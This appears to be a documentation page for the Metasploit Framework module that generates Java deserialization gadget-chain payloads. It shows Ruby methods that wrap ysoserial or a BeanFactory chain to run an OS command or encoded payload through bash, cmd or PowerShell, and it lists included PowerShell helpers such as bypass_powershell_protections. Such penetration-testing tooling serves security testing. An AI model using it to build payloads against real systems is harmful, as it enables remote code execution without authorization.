Module: Msf::Exploit::JavaDeserialization

Includes:
Powershell
Included in:
Remote::JndiInjection
Defined in:
lib/msf/core/exploit/java_deserialization.rb

Class Method Summary collapse

Instance Method Summary collapse

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #initialize, #make_subs, #process_subs, #read_script, #run_hidden_psh

Class Method Details

.gadget_chainsObject 



69
70
71
72
73
 
# File 'lib/msf/core/exploit/java_deserialization.rb', line 69

def self.gadget_chains
  chains = Msf::Util::JavaDeserialization.ysoserial_payload_names
  chains << 'BeanFactory' # not a ysoserial payload, but still supported
  chains.sort
end

Instance Method Details

#generate_java_deserialization_for_command(name, shell, command) ⇒ String

Generate a binary blob that when deserialized by Java will execute the specified command using the platform-specific shell. Many deserialization gadget chains pass the command to `Runtime.getRuntime().exec()` as a string which has limitations on characters in the command such as whitespace and quotes. Using a specific shell will cause the command to be invoked as an array using that shell and thus work around those limitations.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • shell (String)

    The shell to use for executing the command. Must be one of bash, cmd or powershell.

  • command (String)

    The OS command to execute.

Returns:

  • (String)

    The opaque data blob.



19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 
# File 'lib/msf/core/exploit/java_deserialization.rb', line 19

def generate_java_deserialization_for_command(name, shell, command)
  # here we force usage of a modified type to avoid compatibility issues with command characters that are present in
  # some ysoserial payloads
  unless %w{ bash cmd powershell }.include? shell
    raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
  end

  if name == 'BeanFactory'
    blob = Msf::Util::JavaDeserialization::BeanFactory.generate(command, shell: shell)
  else
    blob = Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
  end

  blob
end

#generate_java_deserialization_for_payload(name, payload) ⇒ String

Generate a binary blob that when deserialized by Java will execute the specified payload. This routine converts the payload automatically based on the platform and architecture. Due to this, not all combinations are supported.

Parameters:

  • name (String)

    The name of the YSoSerial payload to use.

  • payload (Msf::EncodedPayload)

    The payload to execute.

Returns:

  • (String)

    The opaque data blob.

Raises:

  • (RuntimeError)

    This raises a RuntimeError of the specified payload can not be automatically converted to an operating system command.



45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
 
# File 'lib/msf/core/exploit/java_deserialization.rb', line 45

def generate_java_deserialization_for_payload(name, payload)
  command = nil

  if payload.platform.platforms == [Msf::Module::Platform::Windows]
    if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
      command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true })
    elsif payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'cmd'
  else
    if payload.arch.first == Rex::Arch::ARCH_CMD
      command = payload.encoded
    end
    shell = 'bash'
  end

  if command.nil?
    raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
  end

  generate_java_deserialization_for_command(name, shell, command)
end